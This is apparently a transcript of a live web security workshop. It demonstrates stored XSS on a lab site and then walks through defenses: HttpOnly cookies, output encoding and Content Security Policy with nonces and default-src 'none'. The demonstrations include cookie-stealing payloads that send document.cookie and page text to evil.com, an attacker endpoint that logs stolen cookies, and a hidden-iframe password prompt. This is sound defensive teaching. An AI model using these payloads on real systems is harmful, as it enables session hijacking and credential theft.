Web Security Essentials Live Workshop with Mike Sherov - Part 3
Mike: [00:00] We're back from... [inaudible] is good, too. Can we get like a thumbs up, a plus, or whatever, to indicate folks being back? OK, we're going to flood...Oh my goodness, the pluses are coming. We have enough. We have enough people back. Jeez, OK. I know the trick on how to get everyone to participate. I just tell you if you're there, acknowledge you're there. OK.
[00:40] We're on lesson number nine. We are going to talk about XSS. Before we get started, does anyone want to take a try at explaining what XSS is to the group? I will fill in details. Hopefully, everyone stretched. OK.
Woman: [01:12] You already told us the answer already, Mike, before the break.
Mike: [01:16] I did tell you that, OK. Just to recap XSS: XSS is when an attacker injects a malicious script into a website. It occurs when an application trusts user input without validating it, and then doesn't encode it on the way out. An attacker can put HTML into a payload.
[01:46] If the site doesn't turn it into the encoded form of HTML -- if it doesn't turn the angle bracket into the encoded version of the angle bracket -- the browser will interpret it as HTML. That essentially gives an attacker carte blanche access to your site. If they can inject a script, the browser has no way of knowing it was them that injected the script, and so they can do everything that you could do.
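To make the encoding step concrete, here is a minimal sketch of HTML entity encoding in JavaScript. The function name encodeHTML is hypothetical; in practice you'd reach for a vetted templating or sanitization library rather than hand-rolled escaping.

```javascript
// Minimal sketch of output encoding. Ampersand must be replaced first
// so already-encoded entities aren't double-encoded.
function encodeHTML(untrusted) {
  return untrusted
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

console.log(encodeHTML('<script>alert("hi")</script>'));
// → &lt;script&gt;alert(&quot;hi&quot;)&lt;/script&gt;
```

With the angle brackets encoded, the browser renders the payload as inert text instead of executing it.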
[02:16] Let's go ahead and make an XSS. We still want to try to get this session ID cookie. We've mitigated man-in-the-middle attacks with HTTPS, HSTS, and the secure flag. We've mitigated CSRF by turning on SameSite cookies and putting in CSRF tokens. We still have it in a cookie on our site, and we want to prevent an attacker from accessing it, but the attacker has XSS.
[03:04] Which exercise am I in? OK. As an attacker, what I'm going to want to do is construct a payload that I can deliver to the person's site. I'm going to log in to the target website -- long passwords typed many times -- the website that I want to attack. I want to steal the cookies. Right now, I can go into the console as the attacker.
[03:52] I could type document.cookie. Document.cookie is the JavaScript way to pull out whatever cookies this site currently has; it'll just print them out over here. Here I am in the console, and it says the SID is this. If I want to steal this cookie, I need a way to make this website execute a script that I wrote that will steal the cookie.
[04:27] If I'm a penetration tester or if I'm a hacker, I'm going to try to submit a message that contains a script. I'm going to go ahead and console.log "hacked". I'm going to submit that as my message. You can see now that when the page reloaded, it says hacked. If I look at the source of the page, we'll understand why. The last message from Mike Sherov was this script with the console.log of hacked.
[05:07] The browser has no way of knowing that this was my input as a hacker. It thinks it's just any other script. As a hacker, I now know that I can make a script execute whatever I want. What do I want? I want document.cookie. How am I going to get document.cookie? Well, if I have access to scripts, can I somehow transmit that cookie over the wire? The answer is yes.
[05:42] What I'm going to do is, I'm going to go back to my little hacker lab here, and I'm going to make a page. Where am I? I'm going to call this hijack.html. As a hacker, I'm going to keep a running tally of all the payloads that I need. The first thing I'm going to do is I'm going to start a script tag, so I know I have access to script.
[06:17] I ultimately want to make a request to my site that takes document.cookie. I know I need that. I know I need to transmit this to my endpoint. Rather than writing a fetch call, I can just generate an image and transmit the message as the image's src. I'm going to write const image = new Image().
[06:47] This will create a new DOM element that's an image element. I can set the image's src to be a URL that I control, evil.com:666, and make it submit to my hijack endpoint, which I haven't made just yet, and I'm going to say the payload is equal to document.cookie. Now, in order to make sure this transmits correctly, I have to encode it.
[07:26] JavaScript has a built-in URL-encoding utility called -- I spelled this completely wrong -- encodeURIComponent. I will encode document.cookie, and that is going to be my image source. I save. I've now set my image src to evil.com:666/hijack?payload= followed by the encodeURIComponent of document.cookie.
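Putting the payload together, this is roughly what the attacker's script does. The buildHijackUrl helper is a name introduced here for clarity; in the lesson the expression is written inline, and the https scheme on evil.com:666 is an assumption.

```javascript
// Build the exfiltration URL: the stolen cookie rides along as a
// URI-encoded query parameter.
function buildHijackUrl(cookie) {
  return 'https://evil.com:666/hijack?payload=' + encodeURIComponent(cookie);
}

// In the browser, the payload fires the GET request simply by
// setting an image src -- the image never needs to be in the DOM:
//   const image = new Image();
//   image.src = buildHijackUrl(document.cookie);
```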
[08:09] I save this, I take the script, I copy it, I go back over to the website, I submit my script. You can see I get something new in the console. I can see that a network request was sent out to evil.com:666/hijack?payload= my session ID. The problem is, as a hacker, I just haven't made the endpoint yet. Let me go back over here into my index file.
[08:53] As a hacker, I can go ahead and create another route. That route will be called hijack, and it will respond to GET requests, because that's what the image is going to submit with. I'm going to console.log that I received a cookie, and console.log the payload parameter of the request. Then I'm going to respond with status 200 and OK.
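The attacker's endpoint can be sketched as an Express-style handler. The /hijack path and the payload query parameter match what the image URL sends; the exact Express wiring is an assumption based on the workshop's setup.

```javascript
// Log whatever cookie the victim's browser sent us, then respond 200
// so the request looks uneventful.
const hijackHandler = (req, res) => {
  console.log('Received cookie:', req.query.payload);
  res.status(200).send('OK');
};

// Wired up on the evil.com server as:
//   app.get('/hijack', hijackHandler);
```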
[09:55] There is that. I'm going to restart my evil.com server. Now I should be able to refresh again. And this is still 404. OK, evil.com:666/hijack. I've created a hijack route over here. What did I do wrong? Let's see.
[10:54] Oh, there we go. I submitted my hack, and as you can see, it made a request with my payload. I can now go check the console on my running evil.com server. I have now stolen the session ID cookie from the user. Now, this is worse than the CSRF, because this is stored. Any person who visits this site now is going to have this run for them.
[11:23] It'll be sending out all of the session IDs over to my server as an attacker. This is called stored XSS, which is even more dangerous than the other form of XSS, called self-XSS, where the payload doesn't get stored on the server and replayed for every single person.
[11:43] Now, it's important to note that we are extremely naive on our current site. We're not doing any sort of XSS protection. We're not encoding any values on the way back out. We're just echoing the information back to the user. Most sites have some form of XSS protection, and some frameworks offer some form of it as well.
[12:11] I want to dispel the myth that things like React, Vue, or any of these other client-side frameworks are immune from XSS. It's hard to do XSS with React or Vue. They do have some form of default escaping, but there are still things like dangerouslySetInnerHTML. There are other ways in which you could XSS React.
[12:35] If you Google, "Is React XSS safe?" you get a long list of reasons why it is or isn't a 100 percent safe. No matter what, your framework doesn't handle this for you. It handles a lot of it for you, but it doesn't handle everything for you.
[12:55] This idea here that this site is completely open just shows us that it can be as egregious as not doing anything with the input and just spitting it back out, all the way to very nuanced versions of XSS attacks. You can see how quickly we were able to exploit the site and get the session ID out of it. Does anyone have any questions about this before we do the actual exercise?
[13:33] Again, the solution is in the solution folder. What we did is we constructed a hijack script that makes an image and sets its src equal to evil.com:666/hijack?payload= the URI-encoded version of the document cookie. We then pasted this into the other site running on the other side of the house, and we made an endpoint called hijack that console.logged request.query.payload on the other side.
[14:15] That would allow us to console.log on the right-hand side here the actual cookie that was received. We'll take six or seven minutes for this. Everyone can try it for themselves. I'll also take any questions while we're doing the exercise.
Man: [14:44] To make sure I'm understanding this correctly: at least in the example, you put a malicious script into the submit form, and that sent it to the server?
Mike: [15:02] Right.
Man: [15:04] How do other people get it?
Mike: [15:10] Good clarification. I took this and I pasted it into the submit form. On the site, the message form is here. If the user is logged in, then we push whatever they sent along as the message text onto the messages variable. Then, when we get the messages, it reads that messages variable back out and joins them together.
[15:51] Because we saved their message as is, and because we spit that message back out as is without encoding it, any person who visits this page is going to get those other messages.
Man: [16:10] OK, I get it. I understand.
Mike: [16:12] Imagine the messages are a list of all the messages submitted by everybody.
Man: [16:20] Yeah, I get it. That makes more sense. Thank you.
Mike: [16:24] No problem. Because we're doing this all in memory -- typically, what would happen here is, as this message is pushed, we would store it in a database. Over here, in messages.join, we would retrieve it from the database and print it out. Because we haven't encoded it before printing it out, you get the raw HTML that we submitted as the hacker back out.
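The vulnerable pattern being described can be condensed into a few lines. The function names here are illustrative, not the workshop's exact code: messages go in raw and come back out raw.

```javascript
// In-memory message store with no validation and no output encoding --
// the XSS bug in miniature.
const messages = [];

function addMessage(text) {
  messages.push(text); // stored exactly as submitted
}

function renderMessages() {
  // raw strings joined straight into the page's HTML
  return messages.join('<br>');
}

addMessage('<script>console.log("hacked")</script>');
console.log(renderMessages());
// → <script>console.log("hacked")</script>
```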
[16:58] I'm going to ask a question while everyone comes back. I guess Will just answered this, but this form of XSS is called a stored XSS. If the attack is successful, does it affect all users, specific users, or just the attacker themselves, and why?
[17:32] Just as Will said, the answer is all users, because essentially this is stored in a database and presented as if it were the site's own script, so other visitors would execute it just the same way. Just a reminder, again, that while frameworks offer pretty good protection against XSS, they do not solve all forms of it for you.
[17:59] It's important to know and look up how your frameworks could in general be affected. Cool. We once again have...Sorry, Alex has a question. "If Facebook didn't sanitize user inputs, and let's say you post a bunch of script as a message, like we were doing here, then all my friends would see my message post, would have their cookies sent to my server?"
[18:30] Yes. The answer is yes. Maybe people remember MySpace. MySpace basically was a giant XSS attack. People used to customize their MySpace pages by putting in HTML. That just happened to be allowed by MySpace, before they knew how to sanitize inputs, and it became a feature of MySpace. They had a really complicated XSS filter for their site, but people were still able to break through it.
[19:01] There was a hacker named Samy who created what was known as the Samy worm. Just by visiting someone's MySpace profile, it would replicate itself to your profile and set your hero -- MySpace profiles used to have a "hero" -- so your page would say, "Samy is my hero." Then, when anyone visited your page, it would replicate to them.
[19:27] It was basically a worm on MySpace that, by the time they caught it, something like 75 percent of MySpace profiles said, "Samy is my hero," on them. Yeah, if you don't escape malicious inputs, it's essentially free rein. It's pretty hilarious. Google Samy worm.
[19:48] Samy is the same person who made this thing called the evercookie, which uses 30 or 40 different ways to persist information between page refreshes, from cookies, to local storage, to session storage, to encoding the value in the bits of a PNG that it can then extract again later. Pretty serious stuff there. We're back to it. We have our malicious payload from evil.com.
[20:24] We know we could paste it in and steal the cookie. Now, the problem here is that not only do we have XSS, but we also have the fact that the hacker can access document.cookie. One way in which we want to fix this is making sure our session ID cookie is not available to JavaScript. We need the session ID cookie to be sent along when we make requests.
[20:52] We don't need to be able to access it on our site via document.cookie. What we can do is -- again, Express Session's default is to set HTTP-only, but let's pretend it wasn't. We say httpOnly: true, and that will do the same thing as it did for SameSite and for secure. It'll append ;HttpOnly as a flag on the cookie.
[21:23] What that does is it still will submit the cookie when you make a request, but it won't allow the cookie to be seen via document.cookie. If we're a hacker, again, we copy in our same malicious payload. We can log into our site again, and we can paste in our hacker message. Sorry, I forgot to clear cookies. Not HTTP-only. I think I did this wrong. Sorry.
[22:32] Once we reopen our window -- sometimes weird fixation stuff happens -- we're back over here. We're going to log back in. Why is HTTP-only not set? Sorry, give me one second, folks. It should be true, and why isn't it? Am I not in the right lesson? I'm in nine. I should be in 10. Sorry, wasted your time for a few seconds there. OK, yep, now we have the HTTP-only flag.
[23:49] Apologies for that blip. We can paste in our hijack text here. Submit, and maybe you need to bump up the text size to see this one. You can now see that we still make a request. We still have XSS happening, but at least it's not stealing our cookie anymore. Our server logged "Received cookie," but it received nothing.
[24:21] I'm not going to make you do the exercise on this one, unless you want to. But are we done? I guess a couple of questions here. What does setting the HTTP-only flag do? Who would like to answer that one? Be brave. Don't worry about answering too many or too few.
[25:02] OK, maybe that question isn't as exciting. The next one will be a little more exciting. HTTP-only makes sure the cookie is only sent over requests, not programmatically accessible via JavaScript. That is, an HTTP-only cookie will not appear in document.cookie, and therefore can't be extracted via XSS.
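The cookie flags accumulated across these lessons look roughly like this as an express-session cookie config. It's shown as a plain options object; note that httpOnly is actually express-session's default, spelled out here to match the lesson.

```javascript
// Session cookie flags: each one mitigates a different attack class.
const cookieOptions = {
  secure: true,    // only send the cookie over HTTPS (MITM lesson)
  sameSite: true,  // SameSite strict mode (CSRF lesson)
  httpOnly: true,  // invisible to document.cookie (this lesson)
};

// Passed to the session middleware as something like:
//   app.use(session({ secret: '...', cookie: cookieOptions }));
```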
[25:29] Here's the next question: even if we have a session ID cookie set to HTTP-only, are we 100 percent guaranteed to never have cookies leak to JavaScript? Would anyone like to answer that one?
Woman: [25:49] Could you say that again?
Mike: [25:52] Sorry, I'll slow down. Even if we have the session ID cookie set to HTTP-only, are we 100 percent guaranteed to never have cookies leak to JavaScript? This is very similar to the secure flag. Again, HTTP-only is set on a per-cookie basis. If you happen to store some other sensitive cookie in your browser and forget to set HTTP-only on it, that cookie will not be protected.
[26:36] You have to make sure, for each cookie, to set HTTP-only if it needs to be HTTP-only. How does the principle of least privilege, which we've talked about briefly, apply to the HTTP-only flag in this case? And what is the principle of least privilege? I'm looking for anyone to take a shot, even to be wrong. OK. I'll move this along.
[27:29] The principle of least privilege says, just to recap, that any abstraction layer of a software system should only have access to the information required for it to function correctly. In this case, the session ID isn't needed on the client. Therefore, we shouldn't allow the browser to have programmatic access to it.
[27:59] POLP, the principle of least privilege, would say the HTTP-only flag should be set for any cookie that you don't need programmatic access to. Just remember: whenever you're dealing with any sensitive information or any operation on any sort of site, the principle of least privilege applies. Let's move right along, and we are going to go to 11. I can do it from 10. Let's do it from 10.
[28:34] We protected our cookie from being stolen. We're done, right? The answer is that we're not done, because of the same thing we talked about before: you have to attack the source of the problem. The source of the problem isn't that cookies are stealable. It's the fact that anything is stealable. We have XSS on our website. That is an alarm-bells-ringing thing.
[29:05] Just to prove the point here, the next thing we're going to do as the attacker is say: not only are we going to steal the cookie -- and if they blocked me from stealing the cookie, they haven't defended in depth against what I'm about to do here -- I also want to get their Social Security number.
[29:22] I can do far more damage with that thing. Essentially trivially, as the attacker, I can also steal, let's call it, document.body.innerText. What this'll do is just take the entire text representation of the page body. I can take that bit of code here, go back to my server, and paste it in.
[30:04] Now, all of a sudden, not only am I sending a blank cookie, I'm also sending this payload that says, "Hey, Mike Sherov, one, two, three, four, five, six, seven, eight, nine." As the hacker, I've now stolen Mike Sherov's Social Security number. There's not a ton of stuff to talk about for this specific lesson. It's a very, very short lesson, but it's an important one.
[30:40] We were so easily able to exploit this site right after protecting the session ID cookie. What does this tell you about fixing the symptoms of larger problems? Discuss, right? Does anyone want to give an answer as to what fixing symptoms of larger problems does? I know we've been at this for three-and-a-half hours, but I would love it if someone was able to take a shot at answering this.
[31:27] Anybody? We'll move this one along. Again, this is reinforcing the principle of least privilege and attacking root causes as the way to fix things. Oh, I see Will said it creates more problems, yeah. The way I like to think about fixing specific issues is attacking the root source, or the root cause, of the problem. Imagine you have a house, and there are a hundred open windows.
[32:09] Fixing a specific problem like a cookie when you have XSS is like climbing in through one window, closing that window, and saying, "I'm done." There are still 99 other windows open. The point is that when you're doing security work, it may seem quick and easy to fix the vulnerability that's right in front of you, but a really important principle is to attack the root cause.
[32:41] Identify the capability that's being exploited, then fix and mitigate that capability directly rather than indirectly.
Man: [32:52] So here, it means just sanitizing the input?
Mike: [32:56] How we do that specifically, a defense in-depth approach would say sanitize input. It would say encode output. It would say use an allow list of acceptable input rather than a blacklist of unacceptable inputs. We also have to talk about the idea that in-line scripts can run. We have to talk about the fact that scripts from anywhere can run.
[33:27] This is, again, the default behavior of browsers and the default behavior of the Internet and the web platform working against us. Alex has a question about XSS protection. The X-XSS-Protection header is a weak form of the header that we're about to learn about. It's a specific filter for one or two specific types of XSS.
[33:53] It's better to have it turned on than to not have it turned on, but by no means is it a capability fix. It doesn't cut off the XSS at its root. This course is not going to get into how to specifically sanitize input and specifically how to encode output because it's going to be so language and domain-specific. It's going to be so tied to your own implementation.
[34:24] You need to do it, but this course isn't going to show exactly how to do that. Instead, we're going to focus on a bigger and more powerful tool that is available in a lot of browsers -- and we'll show you exactly which ones -- called CSP. Does anyone here know what CSP is?
[34:56] CSP is effectively not in IE11, but it's in Edge, Firefox, Chrome, and Safari. For IE11, you'll have to resort to either blocking it outright, which I plan to do soon, or relying on sanitization, which is what we ultimately want to do anyway. CSP allows us to specify who should run scripts and under what conditions. If we look at CSP, there's a website called ContentSecurityPolicy.com.
[35:42] This is a reference site for CSP. CSP is a set of headers that tell the browser what iframe sources are allowed, what image sources are allowed, what style sheets are allowed, what script sources are allowed. All the capabilities that come by default -- scripts, styles, images, XHR and fetch, fonts, objects, media, iframes, and a set of other things -- you can turn each one of them off.
[36:15] Form actions, whether you can embed this thing in an iframe -- a whole toolkit of behavior. We're going to start off by trying to attack our very first problem, which is that the site will execute inline scripts. If we look at our code, we don't have any inline scripts. All of our scripts are via src. For example, this is loading static index, and this is loading code from jQuery.
[36:50] Our only inline script is the hacker's script. So we're going to want to go ahead and actually implement CSP to say, only allow certain sources. Now in order to do this, where am I? Lesson 12? Just getting back up to speed in lesson 12. First, before we actually turn on the enforcement, CSP has this thing called Report Only mode.
[37:37] Now, why would you want report-only mode? Let's say you're working on a large legacy site -- we all work on greenfield projects, right? You might be working on a site that has some inline scripts somewhere. There are dark corners of large legacy websites everywhere. Before you stop running scripts, you might want to know what scripts would be blocked if you turned on CSP.
[38:06] We'll start off with CSP Report Only mode. Every time a CSP violation happens, rather than blocking the behavior, it will report that the behavior would have been blocked. I'll pause for a quick question there, if anyone has any questions on what we're about to do.
[38:46] The first thing we're going to do is make sure we can receive those reports. CSP has a default format for when a violation happens, and it submits the report as JSON. In the Express world, we need a different parser to pull that information out of the request. In this case, we need a JSON body parser. We're going to require the NPM package body-parser.
[39:21] We're going to say that we're going to use it now. Again, we're going to introduce another middleware here; we'll say app.use. Helmet, once again, provides another set of secure headers, this one called contentSecurityPolicy. Content security policy takes in a configuration object. That object takes two things. It takes a set of directives.
[39:55] These are the CSP directives we want to have happen. We also say reportOnly: true. Our directives say we only want to allow script sources that are the string 'self' or https:. Now, 'self' means this origin, whether it's HTTPS or not; https: means anything served over HTTPS. The reason we need anything that's HTTPS is because, in our messages route, we still have to allow our jQuery code, which is loaded over HTTPS.
[40:45] We want to allow that to happen. We want to say that our report URI is /report-violation. Again, we have created a content security policy that allows 'self' and https:, with /report-violation as the report URI, and we're doing it in report-only mode. We now need to also use that body-parser middleware to parse the JSON.
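Written out, the helmet configuration described above is roughly this options object. Option and directive names follow helmet's contentSecurityPolicy middleware as used in the workshop repo, so treat this as a sketch.

```javascript
// Report-only CSP: scripts may come from this origin or any HTTPS
// source, and violations are POSTed to /report-violation.
const cspOptions = {
  directives: {
    scriptSrc: ["'self'", 'https:'],
    reportUri: '/report-violation',
  },
  reportOnly: true, // report, don't block -- safe for legacy rollouts
};

// app.use(helmet.contentSecurityPolicy(cspOptions));
```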
[41:22] CSP reports come in with a MIME type of application/csp-report and a JSON body, so we want to parse the request as JSON if the MIME type is application/csp-report. I can save that and app.use it. Then, last but not least, we want to actually add our route for report-violation, which is the same kind of thing as this.
[42:15] This will allow us to post a request and response. I'm going to cheat a little bit here and do a quick copy/paste just so you don't have to watch me type this whole thing out. Just to make sure I didn't have any typos, I'll paste over the whole thing. Our report violation endpoint will console.log CSP violation with the request body and then respond with 200.
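The receiving side can be sketched as two pieces: a body parser keyed to the CSP report MIME type, and the handler itself. Express-style signatures are assumed, as in the workshop repo.

```javascript
// Log each CSP violation report and acknowledge it.
const reportViolationHandler = (req, res) => {
  console.log('CSP Violation:', req.body || 'No data received');
  res.status(200).send('OK');
};

// Wired up as:
//   app.use(bodyParser.json({ type: 'application/csp-report' }));
//   app.post('/report-violation', reportViolationHandler);
```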
[42:54] Now, if we start up our server again, take our evil.com payload, log back into our site, and submit our message, the first thing you'll notice is that the response now has a Content-Security-Policy-Report-Only header that says the accepted script sources are 'self' and https:, and to send report violations to this URI. That's how you know you did it right. We now paste in our hacker's attack.
[43:42] We hit submit, and look, we now see that there is a report-violation request fired off with a full, detailed CSP report that says, "Here's the URL that was blocked" -- so it was an inline script. This is a report. It happened at this URL. Here's the policy that was violated, the script-src policy, on line number four. A whole set of things for you to figure out where your CSP violations are coming from.
[44:16] You can see that we have logged it in the console. This gets us to a place where we are now able to see not only hackers attacking our site, but also any of our own scripts that accidentally violate the policy. We have approximately 16 minutes left in the course. If you all want to have time to do this exercise, I'm happy to give you five or six minutes here.
[44:54] I don't think we can complete the exercise in five or six minutes. I'd rather continue through, get to the end of the course, and save time at the end. Is that OK with everybody? Can I get a negative one if you want to stop and pause here for seven minutes to do the exercise?
[45:24] I'm going to move forward, then. To answer Josh's question, though: if the hacker is attacking us from an HTTPS site, would this not protect us? That is exactly right. Again, it's a cat-and-mouse game here. We're running in report-only mode. The next thing we need to do, just to stop and show the proof here, is turn off report-only mode.
[45:56] All we have to do for that is remove the reportOnly flag. We can run the hijack again, and this time you'll see that the script won't execute. Let me just refresh that page. We were getting the report, which is good, but we're no longer sending that request over to the hacker site, and they're not able to log anything in their logs. We have effectively mitigated XSS attacks, right? No, we have not.
[46:43] What Josh was alluding to in the chat was that if they have an HTTPS site, they can attack us. Everyone these days can access HTTPS. There are free SSL certificates from Let's Encrypt. It's very easy to create SSL or TLS certificates. It isn't the barrier that it used to be for hackers. What do we want to do? Well, we want to prove the point that the hacker can actually still hack us.
[47:19] As the hacker, I'm going to just take this script. Where is my evil.com static site? I'm going to create a new file in here called index.js. I'm going to take this code, I'm going to paste it into that file, index.js, which now lives at the hacker's index file. I can now, in my attack payload, reference that script. I can just paste this script into the site. What do I have here? Oh, yeah, CSRF. I can paste that in.
[48:23] Now, again, the hacker is trying their evil hijack. You can see that hijack.js doesn't exist.
Man: [48:35] Sorry, Mike. The file is named index.js, not hijack.js.
Mike: [48:58] Yes, good point. This should be renamed hijack.js. Good catch; I apologize. You can see that we can take the script, paste it into there, hit submit, and we see that the hijack script was downloaded and our payload got sent again. That's proving the point that Josh was making in the chat, but in a different way.
[49:56] A better way to do this is to identify a way to separate the scripts that we put there on purpose from scripts that the attacker put there. The way you do this is using what's known as a nonce. Nonce is a term for a number used once. CSP provides a way for us to say that the thing we want to allow is any script tag that has the right nonce attached to it.
[50:31] Just to show what that looks like: first, I'm going to take my crypto package, because I need a cryptographically secure nonce. Then I'm going to create my own middleware here. This middleware is going to generate a 16-byte string -- otherwise known as 128 bits, which is cryptographically strong enough to resist brute force -- and save it off as a variable called nonce in my locals.
[51:10] Then, in my content security policy, instead of allowing https:, I can pass a callback function that will get executed. The script source that I will allow is 'nonce-' plus the value of that nonce. The way this looks when I log in is that my header will say nonce-whatever. To Naomi's earlier point, this changes on every request. Every request comes in with a new nonce.
[52:18] Now, what we can see here is that, because we allow 'self', our index.js file that we loaded from our static route is fine, but our jQuery code is blocked. The reason the jQuery code is blocked is that we haven't added the nonce to the jQuery script tag. We go over to messages, and we will use the nonce as the nonce attribute of the script tag.
[52:49] Because we have access to the request and the response, and because the response has locals, we can paste it in over here. We say, load the code from jQuery; its nonce attribute is equal to the nonce from the response's locals. The way this looks when we load back up again is that jQuery now loads fine. If we view the page source, we can see that jQuery has a nonce equal to our nonce.
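In the template, the script tag picks up the same value. A hypothetical rendering helper makes the shape clear; the src URL used below is a placeholder for wherever jQuery is actually loaded from.

```javascript
// Emit a script tag whose nonce matches the one in the CSP header.
function renderScriptTag(src, nonce) {
  return `<script src="${src}" nonce="${nonce}"></script>`;
}

// In the messages route, this would be called with res.locals.nonce.
```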
[53:26] Again, this is similar to CSRF tokens, right? We passed down a cryptographically secure, randomly unguessable value both in our response header and as a value on the script tag that we want to allow. Because a hacker can't guess that value, and because it changes every single time, they effectively can't use the nonce themselves.
[53:52] When they paste in their hijack, and it has a script tag with a src of evil.com:666/hijack.js, then boom, it's blocked by CSP. We've mitigated script XSS. We've mitigated XSS, right? Does anyone have any questions about this?
[54:33] Just to recap, we implemented CSP using a nonce-based approach for script tags, which allows us to specify which scripts we put on the pages ourselves. Any scripts entered by a hacker, or any inline script tags, won't be allowed, because our CSP doesn't allow them.
[54:51] The browser gives us the capability to say don't allow these scripts to run, which is what we actually want as our bedrock mitigation. Now, the problem here is that we still haven't mitigated everything. We've mitigated scripts, but our hacker is sneaky. Our hacker is going to also inject a hidden iframe in as the payload.
[55:26] That iframe is going to point to his steal file. We're going to save this as steal.html. That is going to execute a script that prompts the user for their password. Prompt is a function in the DOM that literally pops up the little window that asks you a question you can type your answer into. We made the steal.html file, our hijack references it, and we've made our iframe hidden.
[56:05] What this looks like: when I go to the site and paste this in as my payload, you can't see the iframe, but a pop-up appears on the site that says enter your password. Yes, there is some mitigation here, in that Chrome says this came from evil.com and not from localhost.charlesproxy.com. But what if I make my domain name look close to charlesproxy.com instead of evil.com?
[56:36] If I said Charles Proxy with two Ys, or Charles Proxy with a zero instead of an O, you'd be none the wiser. All we've done so far with CSP is mitigate scripts. We haven't mitigated iframes, which allow just as many attacks, such as this one. We'll go back to our code again. Now we know that there are attacks through basically every single avenue.
[57:16] We have attacks from image tags. We have attacks from script tags. We have attacks from iframes. There are attacks based on style tags that people inject -- people can modify the content property of an element to show a fake message. What we want to do by default is say, "Don't allow anything. We ourselves are going to decide what to allow."
[57:42] We can do this by using that same kind of source directive for each resource type we want to allow. We define a value of self plus our nonce, and say that script-src uses it. We're also going to use it for XHR requests with connect-src, and we want images to come only from our own site with img-src.
[58:28] We'll say that we only want to allow that for style tags, too. You know what? We don't actually care about iframes. We don't even want iframes! Don't allow iframes at all. What CSP has is a thing called default-src. The default of default-src is to allow everything. We want to say that the default source that applies to all of these different sub-resources is actually none.
[58:59] You use the string 'none'. This says, "If there isn't a more specific source directive, like script-src, connect-src, img-src, or style-src, use this default." This implicitly says that the source for iframes is none.
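Putting the last few steps together, the full policy might be built like this. A sketch, assuming illustrative names — the report endpoint path and the helper function are not the workshop's exact code:

```javascript
// Sketch: deny everything by default, then open up only the
// sub-resources we actually use. The nonce value is illustrative.
function buildCsp(nonce) {
  // No frame-src entry, so iframes fall through to default-src 'none'.
  return [
    "default-src 'none'",                 // block anything not listed below
    `script-src 'self' 'nonce-${nonce}'`, // our scripts + nonced tags
    "connect-src 'self'",                 // XHR/fetch to our origin only
    "img-src 'self'",                     // images from our origin only
    "style-src 'self'",                   // stylesheets from our origin only
    'report-uri /report-violation',       // where violations get reported
  ].join('; ');
}

console.log(buildCsp('abc123'));
```

With `default-src 'none'` as the floor, anything you forget to whitelist is blocked rather than silently allowed.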
[59:17] If I save that off, go back to this page, and log back in again, I can see first and foremost that my response looks like this: default-src is none, script-src is self or this nonce, connect-src (for XHR) is self or that nonce, img-src is self or that nonce, style-src is self or that nonce, and send all of our violations to report-violation.
[59:46] Now when I paste in my steal script, I can paste all three of these attacks in at once. I hit submit. Boom, I get three violations. One for the in-line script violation, one for the evil.com hijack violation, and one for the violation of evil.com as an iframe.
[60:23] You absolutely still must do input sanitization and output encoding in addition to CSP, especially for older browsers like IE 11 and before that don't support it. CSP gives you a much more robust browser capability to block this stuff. There was a vulnerability recently in Google. Where is this? I'll find the article another day. Here!
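The output encoding mentioned above can be sketched as a small helper — this is the standard entity-escaping idea, not the workshop's exact code:

```javascript
// Sketch of output encoding: turn HTML-significant characters into
// entities so user input renders as text and is never parsed as markup.
// The ampersand must be replaced first, or it would double-encode the
// entities produced by the later replacements.
function encodeHtml(input) {
  return input
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;');
}

console.log(encodeHtml('<script>alert(1)</script>'));
// → &lt;script&gt;alert(1)&lt;/script&gt;
```

A payload encoded this way displays as literal text on the page instead of executing, which is the defense-in-depth layer beneath CSP.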
[61:07] There was an awesome vulnerability in the new Gmail dynamic email feature. XSS, right? But CSP stopped the code from ever executing. CSP gives you an underlying robust mechanism to stop XSS dead in its tracks.
[61:31] I'm sorry I had to blow through some of the final XSS stuff. I wanted to make sure we finished by four o'clock. I also encourage you to go through the solution, the questions, and the exercises on your own time. I'm happy to stick around and answer questions from whoever wants to ask them.
[62:01] Just to recap, give the two-minute version, we went through man in the middle and how to mitigate that with HTTPS, HSTS, and secure cookies. We mitigated CSRF with same-site cookies and CSRF tokens. We mitigated XSS with content security policy. All three of which are completely backend language agnostic, all things you could do in your own given language.
[62:33] I really encourage folks to explore more. Go on the OWASP website, read about how this stuff works. This will also be available as a self-paced workshop later this year. I'm planning much more security content ahead. I don't think you need me to learn this stuff. I really was mostly here to bring these type of issues to everyone's attention.
[63:03] I want to thank everyone for participating. Any questions? I'll take as many as I can. Chan says first, "Man in the middle can be mitigated by HTTPS, secure cookies, and HSTS." That is correct, except in the case where someone else owns your network already. If you're at your job, there might be a corporate server that's in between you and the Internet anyway.
[63:36] You should never assume that just because you have HTTPS that you actually have a secure line, especially in controlled environments like corporate settings. Josh said, "If we needed third-party iframes, would we just use nonce with iframe to whitelist iframe?" Yes, Josh, you would do that. You would use nonce to whitelist iframe that you're putting on there as well.
[64:01] If you're a UGC website, where users are submitting iframes as HTML, I would suggest that you strip out everything except for the iframe source, then put back in your own iframe with the nonce there. Also, if you're only expecting iframes from a specific domain, CSP lets you specify domains, not just protocols or nonces.
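The domain-whitelisting approach just described might look like this. The trusted host here is a made-up example, and the helper name is illustrative:

```javascript
// Sketch: if you expect iframes only from one trusted host, CSP lets
// you whitelist that host directly in frame-src instead of (or along
// with) using nonces. player.example.com is a hypothetical domain.
function cspWithTrustedFrames(nonce) {
  return [
    "default-src 'none'",
    `script-src 'self' 'nonce-${nonce}'`,
    'frame-src https://player.example.com', // only this host may be framed
  ].join('; ');
}

console.log(cspWithTrustedFrames('abc123'));
```

Any injected iframe pointing anywhere else — evil.com included — still falls outside the whitelist and is blocked.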
[64:25] If you have a specific whitelist of domains you'll accept, you can just throw those in there as well. Also, you don't have to use the chat if you want to speak up. Thanks for all the kudos, everybody. Really appreciate all the participation. Hopefully it didn't seem like this was my first time, even though it was my first time teaching a live remote workshop.
[64:59] I take the silence as you all being in awe of what you just learned. I will say thanks so much and see you on the other side. Bye. Have a great rest of your day, night, morning or whatever it is where you are. Bye, everyone.